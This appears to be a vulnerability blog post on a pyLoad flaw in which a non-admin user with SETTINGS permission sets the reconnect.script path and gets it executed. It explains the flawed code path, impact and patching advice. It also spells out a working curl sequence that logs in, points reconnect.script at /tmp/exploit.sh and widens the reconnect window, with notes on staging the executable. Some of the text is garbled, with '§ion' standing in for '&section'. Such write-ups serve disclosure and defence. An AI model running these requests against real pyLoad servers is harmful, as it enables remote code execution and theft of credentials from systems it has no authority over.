Listen to this Post
How the mentioned CVE works
The vulnerability abuses the `set_config_value()` API endpoint, which is accessible to users holding the non‑admin `SETTINGS` permission (value 128). This endpoint writes any configuration key without restriction, except for a hardcoded check on general.storage_folder. The `reconnect.script` option, which holds a file path, is therefore fully controllable by an attacker with `SETTINGS` rights.
The thread manager’s reconnect logic later retrieves this path via `self.pyload.config.get(“reconnect”, “script”)` and passes it directly to subprocess.run(). The only verification is `os.path.isfile()` — the file must exist, but no allowlist, path sanitisation, or signature check is performed.
An attacker can also manipulate timing by setting reconnect.enabled, reconnect.start_time, and `reconnect.end_time` through the same endpoint, ensuring the script executes within a chosen window. Additionally, `toggle_reconnect()` requires only Perms.STATUS, an even lower privilege, further easing the attack.
Beyond RCE, the unrestricted config write allows reading proxy credentials in plaintext, redirecting syslog to an attacker‑controlled server, disabling SSL, rebinding the web interface to 0.0.0.0, and modifying SSL certificate paths to enable man‑in‑the‑middle attacks.
DailyCVE Form
Platform: pyLoad
Version: All prior 0.5.0
Vulnerability: Unrestricted config write
Severity: Critical
date: October 2024
Prediction: Fixed in 0.5.0
What Undercode Say:
Analytics – bash commands and codes from the blog
Authenticate as a user with SETTINGS permission curl -c cookies.txt -X POST 'http://target:8000/api/login' \ -d 'username=settingsuser&password=pass123' Set reconnect.script to an attacker‑controlled executable curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core' Enable reconnect and set a wide time window curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=enabled&value=True§ion=core' curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=start_time&value=00:00§ion=core' curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \ -d 'category=reconnect&option=end_time&value=23:59§ion=core' Alternatively, via the Web UI: curl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \ -d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'
Exploit:
A non‑admin user with `SETTINGS` permission writes an arbitrary path into reconnect.script. When the thread manager’s `try_reconnect()` method is called (triggered by the core loop or by toggle_reconnect()), the path is executed via subprocess.run(). The file must exist and be executable. If the attacker also has `ADD` permission (common for non‑admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions upon extraction.
Protection from this CVE
- Apply the official fix (pyLoad ≥ 0.5.0) that adds an allowlist of security‑critical options in
set_config_value(); modifications to these require the `ADMIN` role. - If patching is not possible, restrict `SETTINGS` permission to trusted users only, or remove it entirely from non‑admin accounts.
- Monitor and validate any changes to
reconnect.script,webui.,log.syslog_, and `proxy.` configuration keys. - Consider using network segmentation to limit access to the pyLoad API.
Impact
- Remote Code Execution as the pyLoad process user.
- Privilege escalation: the `SETTINGS` permission is unexpectedly sufficient to run arbitrary code.
- Credential exposure: proxy credentials and SSL keys can be read via
get_config(). - Network security bypass: disabling SSL, rebinding to all interfaces, and redirecting logs enables further attacks (e.g., MITM, log injection).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

